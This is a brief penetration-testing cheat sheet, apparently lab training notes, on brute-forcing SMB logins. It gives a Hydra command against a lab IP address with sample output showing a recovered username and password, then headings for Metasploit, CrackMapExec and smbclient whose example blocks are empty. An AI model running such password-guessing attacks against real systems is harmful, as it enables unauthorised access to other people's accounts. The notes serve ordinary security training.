SMB [139,445]

Brute-Forcing SMB Logins

Hydra Method

hydra -L user.list -P password.list smb://10.129.42.197

βœ… Example Output:

[445][smb] host: 10.129.42.197   login: user   password: password

⚠️ Warning: SMB does not support many parallel connections β€” limit to 1 task!

πŸ›‘ Possible Error:

[ERROR] invalid reply from target smb://10.129.42.197:445/
  • Usually caused by incompatibility with SMBv3

  • βœ… Solution: Use Metasploit instead


Brute-Force SMB with Metasploit

Launch Metasploit:

msfconsole -q

Configure the SMB Login Scanner:

🟒 Example Output:


Enumerating SMB Shares with CrackMapExec

πŸ“ Output Example:


Accessing SMB Shares via smbclient

πŸ” Enter password:

🧾 Example Output:

Last updated